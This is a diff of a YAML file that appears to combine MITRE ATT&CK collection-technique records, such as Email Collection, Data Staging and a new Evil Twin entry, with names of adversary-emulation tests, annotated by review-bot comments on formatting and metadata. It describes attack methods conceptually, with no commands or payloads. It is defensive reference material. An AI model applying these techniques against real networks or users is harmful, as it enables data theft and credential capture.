Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -67061,30 +67534,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
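Review bot: most of this hunk is key reordering, not a content change: the `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` block removed here reappears, with the same values, further down the same object in the following hunks, and the one substantive edit (the new `modified` timestamp) is buried in the middle. Emitting keys in a stable, sorted order from the generator would keep future diffs to the values that actually changed and make reviews of this file tractable.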
@@ -67093,13 +67546,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -67113,20 +67570,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -67169,7 +67643,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests:
- name: using device audio capture commandlet
@@ -67218,7 +67691,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -67238,22 +67711,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -67270,11 +67745,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
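Review bot: replacing the `Office 365` and `Google Workspace` platforms with a single `Office Suite` entry (and bumping `x_mitre_version` to 2.6) changes which platform-specific views this technique belongs to, and the same collapse is applied to T1213.002 and T1530 elsewhere in the patch. Any per-platform index or report generated from this file that is still named or filtered on the old platform strings needs to be regenerated with the new name, otherwise T1114 silently drops out of the Office 365 and Google Workspace listings.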
@@ -67290,37 +67764,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
@@ -67332,22 +67797,41 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests:
- name: Identify Documents on USB and Removable Media via PowerShell
@@ -67374,55 +67858,54 @@ collection:
'
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests:
- name: Stage data from Discovery.bat
@@ -67495,7 +67978,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -67519,8 +68002,6 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests:
- name: Email Collection with PowerShell Get-Inbox
@@ -67565,7 +68046,7 @@ collection:
name: powershell
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -67586,6 +68067,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -67609,8 +68091,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -67635,7 +68119,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests:
- name: Automated Collection Command Prompt
@@ -67770,7 +68253,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests:
- name: Utilize Clipboard to store or execute commands from
@@ -67844,7 +68326,7 @@ collection:
name: powershell
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -67878,10 +68360,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
@@ -67892,13 +68376,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -67939,37 +68424,11 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests: []
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -67980,23 +68439,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -68066,7 +68549,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests:
- name: Search files of interest and save them to a single zip file (Windows)
@@ -68138,7 +68620,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -68157,10 +68639,89 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
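Review bot: the newly added T1557.004 object has a citation key with typographic quotes, `source_name: Australia ‘Evil Twin’`, and the description references it as `(Citation: Australia ‘Evil Twin’)`; the two match byte for byte, but the description also carries en and em dashes, so the lookup only resolves if the generator and every downstream consumer read and write this file as UTF-8 without normalising punctuation. Also, the object arrives with `x_mitre_detection: ''` and `atomic_tests: []`, i.e. no detection guidance and no test; that is plausible for a technique created upstream on 2024-09-17, but confirm it is a complete import rather than a partially populated record.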
@@ -68189,7 +68750,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
@@ -68219,8 +68780,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
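Review bot: this hunk removes x_mitre_attack_spec_version: 2.1.0 from T1602.002 together with spec_version and adds no replacement, whereas the T1557.003 hunk further down replaces 2.1.0 with 3.2.0 in place. Unless the field is set elsewhere in the T1602.002 block (only its tail is visible here), the technique ends up with no attack spec version at all; the T1185 (Browser Session Hijacking) hunk below has the same shape, so please confirm both still carry the field after regeneration.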
@@ -68274,7 +68833,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests:
- name: Compress Data for Exfiltration With PowerShell
@@ -68335,7 +68893,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -68363,12 +68921,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
